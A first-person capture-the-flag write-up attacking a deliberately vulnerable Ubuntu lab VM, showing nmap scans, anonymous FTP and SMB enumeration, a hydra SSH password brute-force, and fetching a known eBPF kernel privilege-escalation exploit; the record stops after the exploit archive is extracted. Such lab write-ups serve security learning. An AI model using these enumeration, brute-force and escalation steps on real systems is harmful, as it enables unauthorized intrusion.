This has turned out to be quite a fun box to attack because it has multiple ways in and supposedly multiple escalation methods too. I prefer this sort of CTF to the ones where they hide passwords in Base64 encoded jpgs in the page source and that sort of thing. This is less of a puzzle/game and more realistic, albeit an unrealistically badly configured security setup.
N.B. when I write these up, I write as I’m doing it so it’s not a carefully edited walk-through as such but more of a record (for myself) as to what I did, as I did and the thought-processes which I’m hoping to improve.
Initial Enumeration
A quick initial nmap scan shows the the following ports open:
root@kali2017-1:~# nmap -sS -n 10.0.0.4 Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-20 11:39 GMT Nmap scan report for 10.0.0.4 Host is up (0.00032s latency). Not shown: 992 filtered ports PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 666/tcp open doom 3306/tcp open mysql MAC Address: 00:0C:29:92:88:9B (VMware)
nmap versions scan shows:
oot@kali2017-1:~# nmap -sV -n 10.0.0.4 Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-20 11:47 GMT Nmap scan report for 10.0.0.4 Host is up (0.00036s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 53/tcp open domain dnsmasq 2.75 80/tcp open http PHP cli server 5.5 or later 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 666/tcp open doom? 3306/tcp open mysql MySQL 5.7.12-0ubuntu1
nmap OS version scan isn’t conclusive – some kind of Linux 3.x/4.x. Whilst I’m getting on with other things, I’ll run a full ports scan for both TCP and UDP.
Anon FTP
So far I can see we’ve got a linux box with FTP, SSH, DNS, a webserver, SAMBA and MySQL running. There is an open FTP port so let’s see if anonymous access is allowed:
root@kali2017-1:~# ftp 10.0.0.4 Connected to 10.0.0.4. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (10.0.0.4:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp>
It is but nothing in there but the banner gives a potential username “Harry”.
I forgot to do a more complete look so give ls -a a try and there is a file called “Note” and it allows me to GET it.
ftp> ls -a 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Jun 04 2016 . drwxr-xr-x 2 0 0 4096 Jun 04 2016 .. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 226 Transfer complete. 107 bytes received in 0.00 secs (97.2925 kB/s)
The Note file says “Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.”
So two more possible usernames: Elly and John, and furthermore it would appear that John is possibly the admin of the system or at least a bit bossy.
I try seeing if I can simply browse further up the file system tree but I can’t. I could try brute-forcing SSH and FTP but really I don’t actually know the usernames for sure at this point.
SAMBA SHARES
Let’s take a look at the SMB shares with enum4linux
root@kali2017-1:~# enum4linux -a 10.0.0.4
Starting enum4linux v0.8.9 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 20 12:40:18 2017
==========================
| Target Information |
==========================
Target ........... 10.0.0.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
================================================
| Enumerating Workgroup/Domain on 10.0.0.4 |
================================================
[+] Got domain/workgroup name: WORKGROUP
========================================
| Nbtstat Information for 10.0.0.4 |
========================================
Looking up status of 10.0.0.4
RED <00> - H <ACTIVE> Workstation Service
RED <03> - H <ACTIVE> Messenger Service
RED <20> - H <ACTIVE> File Server Service
WORKGROUP <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name
WORKGROUP <1e> - <GROUP> H <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=================================
| Session Check on 10.0.0.4 |
=================================
[+] Server 10.0.0.4 allows sessions using username '', password ''
=======================================
| Getting domain SID for 10.0.0.4 |
=======================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================
| OS information on 10.0.0.4 |
==================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.0.0.4 from smbclient:
[+] Got OS info for 10.0.0.4 from srvinfo:
RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=========================
| Users on 10.0.0.4 |
=========================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
=====================================
| Share Enumeration on 10.0.0.4 |
=====================================
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
[+] Attempting to map shares on 10.0.0.4
//10.0.0.4/print$ Mapping: DENIED, Listing: N/A
//10.0.0.4/kathy Mapping: OK, Listing: OK
//10.0.0.4/tmp Mapping: OK, Listing: OK
//10.0.0.4/IPC$ Mapping: OK Listing: DENIED
================================================
| Password Policy Information for 10.0.0.4 |
================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==========================
| Groups on 10.0.0.4 |
==========================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================================================================
| Users on 10.0.0.4 via RID cycling (RIDS: 500-550,1000-1050) |
===================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)That’s a ton of info including confirmed usernames. I notice some of the users collected before don’t tally here. E.g. Harry – there is no user Harry” here and no user with H has the first initial. Sadly is more than one user with J as a first initial so can’t tell which one is the suspected higher-level user “John”.
The shares section mentions Fred and there are two accessible shares: tmp and kathy
Let’s connect to these and see what’s in them
root@kali2017-1:~# smbclient \\\\10.0.0.4\\tmp -N WARNING: The "syslog" option is deprecated OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu] smb: \> ls . D 0 Tue Jun 7 09:08:39 2016 .. D 0 Mon Jun 6 22:39:56 2016 ls N 274 Sun Jun 5 16:32:58 2016 19478204 blocks of size 1024. 16396672 blocks available smb: \> get ls /root/ls getting file \ls of size 274 as /root/ls (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
The ls file contains:
.: total 12.0K drwxrwxrwt 2 root root 4.0K Jun 5 16:32 . drwxr-xr-x 16 root root 4.0K Jun 3 22:06 .. -rw-r--r-- 1 root root 0 Jun 5 16:32 ls drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Whilst I’m there I try creating a file called tmpfile.txt and I can
The kathy share has:
smb: \> ls . D 0 Fri Jun 3 17:52:52 2016 .. D 0 Mon Jun 6 22:39:56 2016 kathy_stuff D 0 Sun Jun 5 16:02:27 2016 backup D 0 Sun Jun 5 16:04:14 2016
I try adding file to this share but I am not allowed.
In the backup folder there is are two files. a vsftpf.conf and a wordpress.tar.gz archive file.
The vsftpf.conf file:
# Example config file /etc/vsftpd.conf # # The default compiled in settings are fairly paranoid. This sample file # loosens things up a bit, to make the ftp daemon more usable. # Please see vsftpd.conf.5 for all compiled in defaults. # # READ THIS: This example file is NOT an exhaustive list of vsftpd options. # Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's # capabilities. # # # Run standalone? vsftpd can run either from an inetd or as a standalone # daemon started from an initscript. listen=YES # # This directive enables listening on IPv6 sockets. By default, listening # on the IPv6 "any" address (::) will accept connections from both IPv6 # and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6 # sockets. If you want that (perhaps because you want to listen on specific # addresses) then you must run two copies of vsftpd with two configuration # files. listen_ipv6=NO # # Allow anonymous FTP? (Disabled by default). anonymous_enable=YES anon_root=/var/ftp/anonymous # # Uncomment this to allow local users to log in. local_enable=YES # # Uncomment this to enable any form of FTP write command. #write_enable=YES # # Default umask for local users is 077. You may wish to change this to 022, # if your users expect that (022 is used by most other ftpd's) #local_umask=022 # # Uncomment this to allow the anonymous FTP user to upload files. This only # has an effect if the above global write enable is activated. Also, you will # obviously need to create a directory writable by the FTP user. #anon_upload_enable=YES # # Uncomment this if you want the anonymous FTP user to be able to create # new directories. #anon_mkdir_write_enable=YES # # Activate directory messages - messages given to remote users when they # go into a certain directory. dirmessage_enable=YES # # If enabled, vsftpd will display directory listings with the time # in your local time zone. The default is to display GMT. The # times returned by the MDTM FTP command are also affected by this # option. use_localtime=YES # # Activate logging of uploads/downloads. xferlog_enable=YES # # Make sure PORT transfer connections originate from port 20 (ftp-data). connect_from_port_20=YES # # If you want, you can arrange for uploaded anonymous files to be owned by # a different user. Note! Using "root" for uploaded files is not # recommended! #chown_uploads=YES #chown_username=whoever # # You may override where the log file goes if you like. The default is shown # below. #xferlog_file=/var/log/vsftpd.log # # If you want, you can have your log file in standard ftpd xferlog format. # Note that the default log file location is /var/log/xferlog in this case. #xferlog_std_format=YES # # You may change the default value for timing out an idle session. #idle_session_timeout=600 # # You may change the default value for timing out a data connection. #data_connection_timeout=120 # # It is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user. #nopriv_user=ftpsecure # # Enable this and the server will recognise asynchronous ABOR requests. Not # recommended for security (the code is non-trivial). Not enabling it, # however, may confuse older FTP clients. #async_abor_enable=YES # # By default the server will pretend to allow ASCII mode but in fact ignore # the request. Turn on the below options to have the server actually do ASCII # mangling on files when in ASCII mode. # Beware that on some FTP servers, ASCII support allows a denial of service # attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd # predicted this attack and has always been safe, reporting the size of the # raw file. # ASCII mangling is a horrible feature of the protocol. #ascii_upload_enable=YES #ascii_download_enable=YES # # You may fully customise the login banner string: #ftpd_banner=Welcome to blah FTP service. banner_file=/etc/vsftpd.banner # # You may specify a file of disallowed anonymous e-mail addresses. Apparently # useful for combatting certain DoS attacks. #deny_email_enable=YES # (default follows) #banned_email_file=/etc/vsftpd.banned_emails # # You may restrict local users to their home directories. See the FAQ for # the possible risks in this before using chroot_local_user or # chroot_list_enable below. chroot_local_user=YES userlist_enable=YES local_root=/etc # # You may specify an explicit list of local users to chroot() to their home # directory. If chroot_local_user is YES, then this list becomes a list of # users to NOT chroot(). # (Warning! chroot'ing can be very dangerous. If using chroot, make sure that # the user does not have write access to the top level directory within the # chroot) #chroot_local_user=YES #chroot_list_enable=YES # (default follows) #chroot_list_file=/etc/vsftpd.chroot_list # # You may activate the "-R" option to the builtin ls. This is disabled by # default to avoid remote users being able to cause excessive I/O on large # sites. However, some broken FTP clients such as "ncftp" and "mirror" assume # the presence of the "-R" option, so there is a strong case for enabling it. #ls_recurse_enable=YES # # Customization # # Some of vsftpd's settings don't fit the filesystem layout by # default. # # This option should be the name of a directory which is empty. Also, the # directory should not be writable by the ftp user. This directory is used # as a secure chroot() jail at times vsftpd does not require filesystem # access. secure_chroot_dir=/var/run/vsftpd/empty # # This string is the name of the PAM service vsftpd will use. pam_service_name=vsftpd # # This option specifies the location of the RSA certificate to use for SSL # encrypted connections. rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key ssl_enable=NO # # Uncomment this to indicate that vsftpd use a utf8 filesystem. #utf8_filesystem=YES pasv_enable=no
In kathy_stuff folder there is a to-do list saying: “I’m making sure to backup anything important for Initech, Kathy”
So maybe Initech are a client and they’ve done a WordPress site for them and set up vsftp for them to transfer files and we’re told where the key files for that are which could come in handy. I think I have enough usernames to give a quick ssh brute-force a shot. I collected up all the names and put them in file and ran hydra against them with a short password list from seclists:
root@kali2017-1:~# hydra 10.0.0.7 ssh -L /root/Desktop/users.txt -P /usr/share/seclists/Passwords/top_shortlist.txt -f -V -t 5 Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. .... .... [22][ssh] host: 10.0.0.7 login: MFrei password: letmein [STATUS] attack finished for 10.0.0.7 (valid pair found) 1 of 1 target successfully completed, 1 valid password found
FTP with credentials
So I have a login now, no doubt for non-admin user. Let’s try him on the FTP:
root@kali2017-1:~# ftp 10.0.0.4 Connected to 10.0.0.4. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (10.0.0.4:root): MFrei 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 5 0 0 4096 Jun 03 2016 X11 drwxr-xr-x 3 0 0 4096 Jun 03 2016 acpi -rw-r--r-- 1 0 0 3028 Apr 20 2016 adduser.conf -rw-r--r-- 1 0 0 51 Jun 03 2016 aliases -rw-r--r-- 1 0 0 12288 Jun 03 2016 aliases.db drwxr-xr-x 2 0 0 4096 Jun 07 2016 alternatives drwxr-xr-x 8 0 0 4096 Jun 03 2016 apache2 drwxr-xr-x 3 0 0 4096 Jun 03 2016 apparmor drwxr-xr-x 9 0 0 4096 Jun 06 2016 apparmor.d drwxr-xr-x 3 0 0 4096 Jun 03 2016 apport drwxr-xr-x 6 0 0 4096 Jun 03 2016 apt -rw-r----- 1 0 1 144 Jan 14 2016 at.deny drwxr-xr-x 5 0 0 4096 Jun 03 2016 authbind -rw-r--r-- 1 0 0 2188 Aug 31 2015 bash.bashrc drwxr-xr-x 2 0 0 4096 Jun 03 2016 bash_completion.d -rw-r--r-- 1 0 0 367 Jan 27 2016 bindresvport.blacklist drwxr-xr-x 2 0 0 4096 Apr 12 2016 binfmt.d drwxr-xr-x 2 0 0 4096 Jun 03 2016 byobu drwxr-xr-x 3 0 0 4096 Jun 03 2016 ca-certificates -rw-r--r-- 1 0 0 7788 Jun 03 2016 ca-certificates.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 console-setup drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.d drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.daily drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.hourly drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.monthly drwxr-xr-x 2 0 0 4096 Jun 03 2016 cron.weekly -rw-r--r-- 1 0 0 722 Apr 05 2016 crontab -rw-r--r-- 1 0 0 54 Jun 03 2016 crypttab drwxr-xr-x 2 0 0 4096 Jun 03 2016 dbconfig-common drwxr-xr-x 4 0 0 4096 Jun 03 2016 dbus-1 -rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf -rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version drwxr-xr-x 3 0 0 4096 Jun 05 2016 default -rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 depmod.d drwxr-xr-x 4 0 0 4096 Jun 03 2016 dhcp -rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 dnsmasq.d drwxr-xr-x 4 0 0 4096 Jun 07 2016 dpkg -rw-r--r-- 1 0 0 96 Apr 20 2016 environment drwxr-xr-x 4 0 0 4096 Jun 03 2016 fonts -rw-r--r-- 1 0 0 594 Jun 03 2016 fstab -rw-r--r-- 1 0 0 132 Feb 10 2016 ftpusers -rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf -rw-r--r-- 1 0 0 2584 Feb 18 2016 gai.conf -rw-rw-r-- 1 0 0 1253 Jun 04 2016 group -rw------- 1 0 0 1240 Jun 03 2016 group- drwxr-xr-x 2 0 0 4096 Jun 03 2016 grub.d -rw-r----- 1 0 42 1004 Jun 04 2016 gshadow -rw------- 1 0 0 995 Jun 03 2016 gshadow- drwxr-xr-x 3 0 0 4096 Jun 03 2016 gss -rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf -rw-r--r-- 1 0 0 12 Jun 03 2016 hostname -rw-r--r-- 1 0 0 469 Jun 05 2016 hosts -rw-r--r-- 1 0 0 411 Jun 03 2016 hosts.allow -rw-r--r-- 1 0 0 711 Jun 03 2016 hosts.deny -rw-r--r-- 1 0 0 1257 Jun 03 2016 inetd.conf drwxr-xr-x 2 0 0 4096 Feb 06 2016 inetd.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 init drwxr-xr-x 2 0 0 4096 Jun 06 2016 init.d drwxr-xr-x 5 0 0 4096 Jun 03 2016 initramfs-tools -rw-r--r-- 1 0 0 1748 Feb 04 2016 inputrc drwxr-xr-x 3 0 0 4096 Jun 03 2016 insserv -rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 insserv.conf.d drwxr-xr-x 2 0 0 4096 Jun 03 2016 iproute2 drwxr-xr-x 2 0 0 4096 Jun 03 2016 iptables drwxr-xr-x 2 0 0 4096 Jun 03 2016 iscsi -rw-r--r-- 1 0 0 345 Nov 20 12:37 issue -rw-r--r-- 1 0 0 197 Jun 03 2016 issue.net drwxr-xr-x 2 0 0 4096 Jun 03 2016 kbd drwxr-xr-x 5 0 0 4096 Jun 03 2016 kernel -rw-r--r-- 1 0 0 144 Jun 03 2016 kernel-img.conf -rw-r--r-- 1 0 0 26754 Jun 07 2016 ld.so.cache -rw-r--r-- 1 0 0 34 Jan 27 2016 ld.so.conf drwxr-xr-x 2 0 0 4096 Jun 07 2016 ld.so.conf.d drwxr-xr-x 2 0 0 4096 Jun 03 2016 ldap -rw-r--r-- 1 0 0 267 Oct 22 2015 legal -rw-r--r-- 1 0 0 191 Jan 18 2016 libaudit.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 libnl-3 drwxr-xr-x 4 0 0 4096 Jun 06 2016 lighttpd -rw-r--r-- 1 0 0 2995 Apr 14 2016 locale.alias -rw-r--r-- 1 0 0 9149 Jun 03 2016 locale.gen -rw-r--r-- 1 0 0 3687 Jun 03 2016 localtime drwxr-xr-x 6 0 0 4096 Jun 03 2016 logcheck -rw-r--r-- 1 0 0 10551 Mar 29 2016 login.defs -rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 logrotate.d -rw-r--r-- 1 0 0 103 Apr 12 2016 lsb-release drwxr-xr-x 2 0 0 4096 Jun 03 2016 lvm -r--r--r-- 1 0 0 33 Jun 03 2016 machine-id -rw-r--r-- 1 0 0 111 Nov 20 2015 magic -rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime -rw-r--r-- 1 0 0 2579 Jun 03 2016 mailcap -rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order drwxr-xr-x 2 0 0 4096 Jun 03 2016 mdadm -rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types -rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 modprobe.d -rw-r--r-- 1 0 0 195 Apr 20 2016 modules drwxr-xr-x 2 0 0 4096 Jun 03 2016 modules-load.d lrwxrwxrwx 1 0 0 19 Jun 03 2016 mtab -> ../proc/self/mounts drwxr-xr-x 4 0 0 4096 Jun 06 2016 mysql drwxr-xr-x 7 0 0 4096 Jun 03 2016 network -rw-r--r-- 1 0 0 91 Oct 22 2015 networks drwxr-xr-x 2 0 0 4096 Jun 03 2016 newt -rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf drwxr-xr-x 2 0 0 4096 Apr 20 2016 opt lrwxrwxrwx 1 0 0 21 Jun 03 2016 os-release -> ../usr/lib/os-release -rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf -rw-r--r-- 1 0 0 552 Mar 16 2016 pam.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 pam.d -rw-r--r-- 1 0 0 2908 Jun 04 2016 passwd -rw------- 1 0 0 2869 Jun 03 2016 passwd- drwxr-xr-x 4 0 0 4096 Jun 03 2016 perl drwxr-xr-x 3 0 0 4096 Jun 03 2016 php drwxr-xr-x 3 0 0 4096 Jun 06 2016 phpmyadmin drwxr-xr-x 3 0 0 4096 Jun 03 2016 pm drwxr-xr-x 5 0 0 4096 Jun 03 2016 polkit-1 drwxr-xr-x 3 0 0 4096 Jun 03 2016 postfix drwxr-xr-x 4 0 0 4096 Jun 03 2016 ppp -rw-r--r-- 1 0 0 575 Oct 22 2015 profile drwxr-xr-x 2 0 0 4096 Jun 03 2016 profile.d -rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols drwxr-xr-x 2 0 0 4096 Jun 03 2016 python drwxr-xr-x 2 0 0 4096 Jun 03 2016 python2.7 drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3 drwxr-xr-x 2 0 0 4096 Jun 03 2016 python3.5 -rwxr-xr-x 1 0 0 472 Jun 06 2016 rc.local drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc0.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc1.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc2.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc3.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc4.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc5.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rc6.d drwxr-xr-x 2 0 0 4096 Jun 06 2016 rcS.d -rw-r--r-- 1 0 0 58 Nov 20 13:04 resolv.conf drwxr-xr-x 5 0 0 4096 Jun 06 2016 resolvconf -rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt -rw-r--r-- 1 0 0 887 Oct 25 2014 rpc -rw-r--r-- 1 0 0 1371 Jan 27 2016 rsyslog.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 rsyslog.d drwxr-xr-x 3 0 0 4096 Nov 20 13:04 samba -rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc -rw-r--r-- 1 0 0 4038 Mar 29 2016 securetty drwxr-xr-x 4 0 0 4096 Jun 03 2016 security drwxr-xr-x 2 0 0 4096 Jun 03 2016 selinux -rw-r--r-- 1 0 0 19605 Oct 25 2014 services drwxr-xr-x 2 0 0 4096 Jun 03 2016 sgml -rw-r----- 1 0 42 4518 Jun 05 2016 shadow -rw------- 1 0 0 1873 Jun 03 2016 shadow- -rw-r--r-- 1 0 0 125 Jun 03 2016 shells drwxr-xr-x 2 0 0 4096 Jun 03 2016 skel -rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf drwxr-xr-x 2 0 0 4096 Jun 04 2016 ssh drwxr-xr-x 4 0 0 4096 Jun 03 2016 ssl -rw-r--r-- 1 0 0 644 Jun 04 2016 subgid -rw------- 1 0 0 625 Jun 03 2016 subgid- -rw-r--r-- 1 0 0 644 Jun 04 2016 subuid -rw------- 1 0 0 625 Jun 03 2016 subuid- -r--r----- 1 0 0 769 Jun 05 2016 sudoers drwxr-xr-x 2 0 0 4096 Jun 03 2016 sudoers.d -rw-r--r-- 1 0 0 2227 Jun 03 2016 sysctl.conf drwxr-xr-x 2 0 0 4096 Jun 03 2016 sysctl.d drwxr-xr-x 5 0 0 4096 Jun 03 2016 systemd drwxr-xr-x 2 0 0 4096 Jun 03 2016 terminfo -rw-r--r-- 1 0 0 14 Jun 03 2016 timezone drwxr-xr-x 2 0 0 4096 Apr 12 2016 tmpfiles.d -rw-r--r-- 1 0 0 1260 Mar 16 2016 ucf.conf drwxr-xr-x 4 0 0 4096 Jun 03 2016 udev drwxr-xr-x 3 0 0 4096 Jun 03 2016 ufw drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-motd.d drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-notifier drwxr-xr-x 2 0 0 4096 Jun 03 2016 vim drwxr-xr-x 3 0 0 4096 Jun 03 2016 vmware-tools -rw-r--r-- 1 0 0 278 Jun 03 2016 vsftpd.banner -rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.chroot_list -rw-r--r-- 1 0 0 5961 Jun 04 2016 vsftpd.conf -rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.user_list lrwxrwxrwx 1 0 0 23 Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb -rw-r--r-- 1 0 0 4942 Jan 08 2016 wgetrc drwxr-xr-x 3 0 0 4096 Jun 03 2016 xdg drwxr-xr-x 2 0 0 4096 Jun 03 2016 xml drwxr-xr-x 2 0 0 4096 Jun 03 2016 zsh 226 Directory send OK. ftp>
There is so much stuff in there it’s hard to know where to start. passwd, apache2 folder, conf files and more.
SSH with credentials
Now let’s see what ssh access MFrei has. He’s not got root access and it’s on the sudoers file but can browse around and run some commands. Let’s see what linux we’re running exactly to see if there is an exploit available.
MFrei@red:/$ uname -a Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
root@red:/tmp/ebpf_mapfd_doubleput_exploit# cat /etc/*-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS" NAME="Ubuntu" VERSION="16.04 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04 LTS" VERSION_ID="16.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" UBUNTU_CODENAME=xenial
Privilege Escalation Exploit
https://www.exploit-db.com/exploits/39772/ has one that fits nicely and at the bottom there is a link to a zip file. This is then stored in my home directory as exploit.tar. Use scp to get this onto the machine since we have ssh access:
root@kali2017-1:~# scp exploit.tar MFrei@10.0.0.4:/tmp/ ----------------------------------------------------------------- ~ Barry, don't forget to put a message here ~ ----------------------------------------------------------------- MFrei@10.0.0.4's password: exploit.tar 100% 20KB 69.0KB/s 00:00
ssh back onto the machine, extract the tar and run the shell script to compile it:
root@kali2017-1:~# ssh MFrei@10.0.0.4
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
MFrei@10.0.0.4's password:
Welcome back!
MFrei@red:~$ ls
MFrei@red:~$ cd /tmp
MFrei@red:/tmp$ ls
decr.c exploit.tar testdir vmware-root
MFrei@red:/tmp$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
MFrei@red:/tmp$ ls
ebpf_mapfd_doubleput_exploit exploit.tar testdir vmware-root
